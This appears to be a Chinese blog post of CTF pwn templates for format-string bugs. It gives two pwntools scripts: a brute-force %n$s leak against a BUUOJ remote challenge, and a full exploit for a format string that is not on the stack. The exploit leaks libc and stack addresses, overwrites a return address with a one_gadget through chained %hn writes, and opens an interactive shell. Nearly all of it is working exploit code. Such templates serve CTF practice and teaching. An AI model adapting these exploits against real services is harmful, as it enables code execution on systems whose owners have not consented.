fmt模板

文章发布时间:

最后更新时间:

文章总字数:
297

预计阅读时间:
1 分钟

页面浏览:加载中...

常见非预期解

1
2
3
4
5
6
7
8
9
10
11
12
for i in range(1, 100):
try:
# r=process('./pwn')
r = remote('node4.buuoj.cn', 26477)
elf = ELF('./pwn')
r.sendlineafter("Give me your name:", 's')
for j in range(3):
r.recvuntil("food: ")
r.sendline('%' + str(10 + 3 * i + j) + '$s.')
print(i, r.recvuntil(b'.', drop=True))
except EOFError:
pass

fmt不在栈上

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from pwn import *
context(os='linux',arch='amd64') #need tmux
context.log_level="debug"

# p = remote("node4.buuoj.cn", 26443)
p = process("./pwn")
p.sendlineafter("Give me your name:", b"/bin/sh")

p.sendlineafter("food:", b'%9$p^%11$p^')
libc_base = int(p.recvuntil("^")[10:-1], 16) - 0x20750 - 240 # __libc_start_main
stack = int(p.recvuntil("^")[:-1], 16)
i_addr = stack - 0x7ffc0bd8af08 + 0x7ffc0bd8ae40
one = libc_base + 0x45226
print(hex(one))
p.sendlineafter("food:", "%{}p%11$hn".format((i_addr - 0x30 + 4) & 0xffff))
# attach(p)
p.sendlineafter("food:", "%{}p%37$hhn".format(1))

p.sendlineafter("food:", "%{}p%11$hn".format((i_addr - 0x18) & 0xffff))
# attach(p)
p.sendlineafter("food:", "%{}p%37$hn".format(one & 0xffff))

p.sendlineafter("food:", "%{}p%11$hn".format((i_addr - 0x18 + 2) & 0xffff))
# attach(p)
p.sendlineafter("food:", "%{}p%37$hhn".format((one & 0xff0000) // 0x10000))
for i in range(8):
p.sendlineafter("food:", "1")
# attach(p)
p.sendlineafter("food:", "1")
print(hex(libc_base))
p.interactive()